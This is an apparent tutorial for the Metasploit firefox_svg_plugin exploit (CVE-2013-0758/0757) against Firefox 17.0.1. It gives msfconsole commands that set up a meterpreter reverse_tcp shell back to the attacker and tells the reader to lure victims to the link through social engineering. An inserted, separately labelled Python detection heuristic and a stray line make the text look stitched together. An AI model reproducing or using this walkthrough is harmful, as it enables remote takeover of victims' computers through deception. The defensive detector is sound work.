This exploit gains remote code execution on Firefox 17.0.1 and all previous versions, provided the user has Flash installed. No memory corruption is used. First, a Flash object is cloned into the anonymous content of an SVG "use" element in the <body> (CVE-2013-0758). From there, the Flash object can navigate a child frame to a URL in the chrome:// scheme. Then a separate bug (CVE-2013-0757) is used to bypass the security wrapper around the child frame's window reference and inject code into the chrome:// context. Once code runs in the chrome execution context, the payload can be written to disk, chmod'ed (on POSIX systems) and executed. Note: Flash is used here to trigger the exploit, but any Firefox plugin with script access should be able to trigger it.
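As an added example (not part of this page or of the Metasploit module), the following is a defender-side heuristic that flags HTML in which an SVG use element references a Flash object, the cloning pattern described above. The element and attribute names checked and the same-document "#id" reference form are assumptions about how such a landing page is built.

```python
# Added detection heuristic (not from the page or the Metasploit module):
# flag HTML where an SVG <use> references a Flash <object>/<embed>, the
# CVE-2013-0758 pattern described above. The element/attribute names and the
# same-document "#id" reference form are assumptions about such a page.
from html.parser import HTMLParser


class SvgUseFlashScanner(HTMLParser):
    """Collect plugin elements by id and the ids that <use> elements reference."""

    def __init__(self):
        super().__init__()
        self.plugins = {}      # id -> attribute dict of <object>/<embed>
        self.use_targets = []  # fragment ids referenced by <use href="#...">

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag in ("object", "embed") and "id" in a:
            self.plugins[a["id"]] = a
        elif tag == "use":
            ref = a.get("href") or a.get("xlink:href") or ""
            if ref.startswith("#"):
                self.use_targets.append(ref[1:])


def is_flash(attrs):
    """True if the attributes of an <object>/<embed> point at a Flash movie."""
    mime = attrs.get("type", "").lower()
    src = (attrs.get("src") or attrs.get("data") or "").lower()
    return "x-shockwave-flash" in mime or src.endswith(".swf")


def scan_html(html):
    """Return one indicator string per <use> that clones a Flash plugin element."""
    p = SvgUseFlashScanner()
    p.feed(html)
    p.close()
    # Cross-check after parsing so the order of <use> and <object> does not matter.
    return [f"svg <use> clones Flash plugin element #{t}"
            for t in p.use_targets if t in p.plugins and is_flash(p.plugins[t])]


# Constructed sample page (not the module's real landing page) for a quick check.
SAMPLE = """<html><body><svg xmlns="http://www.w3.org/2000/svg"
  xmlns:xlink="http://www.w3.org/1999/xlink">
  <object id="f" type="application/x-shockwave-flash" data="movie.swf"></object>
  <use xlink:href="#f"/>
</svg></body></html>"""

if __name__ == "__main__":
    print(scan_html(SAMPLE))
```

A page that only embeds Flash without an SVG use reference, or whose use element points at an ordinary SVG shape, produces no indicator.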
MAC OS X PC
Attacker: Backtrack 5
Victim PC: Windows 7
Open a BackTrack terminal and type msfconsole.
Now type: use exploit/multi/browser/firefox_svg_plugin
msf exploit(firefox_svg_plugin) > set payload windows/meterpreter/reverse_tcp
msf exploit(firefox_svg_plugin) > set lhost 192.168.1.167 (IP of the local host)
msf exploit(firefox_svg_plugin) > set srvhost 192.168.1.167 (this must be an address on the local machine)
msf exploit(firefox_svg_plugin) > set uripath / (the URL path to use for this exploit)
msf exploit(firefox_svg_plugin) > exploit
The URL to give to the victim is //192.168.1.167:8080/
Send the link to the server to the victim via chat, email or any other social engineering technique.
Once the victim opens the link, you have a session on the victim's PC. Use "sessions -l" to list the sessions and their numbers, then type "sessions -i ID" to interact with the chosen session.